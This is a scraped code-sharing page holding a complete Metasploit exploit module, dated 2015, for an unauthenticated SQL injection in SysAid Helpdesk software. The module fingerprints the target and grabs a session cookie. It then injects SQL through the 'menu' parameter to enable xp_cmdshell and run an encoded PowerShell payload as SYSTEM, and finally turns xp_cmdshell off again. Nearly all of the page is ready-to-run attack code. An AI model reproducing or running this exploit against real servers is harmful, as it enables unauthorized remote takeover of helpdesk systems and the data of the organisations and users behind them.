扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 |
# Exploit Title: Sysaid Helpdesk Software Unauthenticated SQLi # Date: 28.11.2015 # Exploit Author: hland # Vendor Homepage: https://www.sysaid.com/ # Version: v14.4.32 b25 # Tested on: Windows 7, Windows 10 # Blog post: http://blog.blankhat.pw/2015/09/unauthenticated-sql-injection-in-sysaid.html ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/exploit/mssql_commands' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Sysaid Helpdesk Software Unauthenticated SQLi", 'Description'=> %q{ This module exploits an unauthenticated SQLi vulnerability in the Sysaid Helpdesk Free software. Because the "menu" parameter is not handled correctly, a malicious user can manipulate the SQL query, and allows arbitrary code execution under the context of 'SYSTEM' because the database runs as the SA user. This module uses a Metasploit generated Powershell payload and uses xp_cmdshell, which is activated and then deactivated after exploitation. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Hland', ], 'References' => [ ['CVE', 'xxxx'], ], 'Payload'=> { 'BadChars' => "\x00" }, 'DefaultOptions'=> { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets'=> [ ['Sysaid Helpdesk <= v14.4.32 b25', {}] ], 'Privileged' => false, 'DisclosureDate' => "Aug 29 2015", 'DefaultTarget'=> 0, )) register_options( [ OptPort.new('RPORT', [true, "The web application's port", 8080]), OptString.new('TARGETURI', [true, 'The base path to to the web application', '/']) ], self.class) end def check peer = "#{rhost}:#{rport}" uri = target_uri.path uri = normalize_uri(uri,"Login.jsp") print_status("#{peer} - Checking for vulnerability") res = send_request_cgi({ 'method'=> 'GET', 'uri' => uri, 'vars_get' => { } }) v = res.body.scan(/\<title\>SysAid Help Desk Software\<\/title\>/) if not v vprint_error("Is this even a Sysaid Help Desk?") return Exploit::CheckCode::Safe else vprint_status("Identified system as Sysaid Help Desk") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Unknown end def mssql_xpcmdshell(cmd,doprint=false,opts={}) force_enable = false begin res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint) #mssql_print_reply(res) if doprint return res rescue RuntimeError => e if(e.to_s =~ /xp_cmdshell disabled/) force_enable = true retry end raise e end end def exploit peer = "#{rhost}:#{rport}" uri = target_uri.path vprint_line("#{peer} - Getting a session token...") res = send_request_cgi({ 'method'=> 'GET', 'uri' => normalize_uri(uri, "Login.jsp"), 'vars_get' => { } }) vprint_line("#{peer} - Cookie's in the jar...") # Got a cookie, now ready to make exploiting requests if res && res.code == 200 #vprint_line("#{res.headers}") cookies = res.get_cookies #vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}") else vprint_line("No 200 response? I'm outta here") return end # Put together the vulnerable URI uri = normalize_uri(uri,"api","v1","menu","menu_items") # Generate powershell payload as an encoded string powershell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:encode_final_payload => true, :remove_comspec => true}) # # Inject payload and wait for shell # print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability") sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--" res = send_request_cgi({ 'method'=> 'GET', 'uri' => uri, 'cookie'=> cookies, 'vars_get' => { 'menu' => sqli, } }) # Deactivate XPCmdShell sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--" print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..") res = send_request_cgi({ 'method'=> 'GET', 'uri' => uri, 'cookie'=> cookies, 'vars_get' => { 'menu' => sqli, } }) end end |
体验盒子
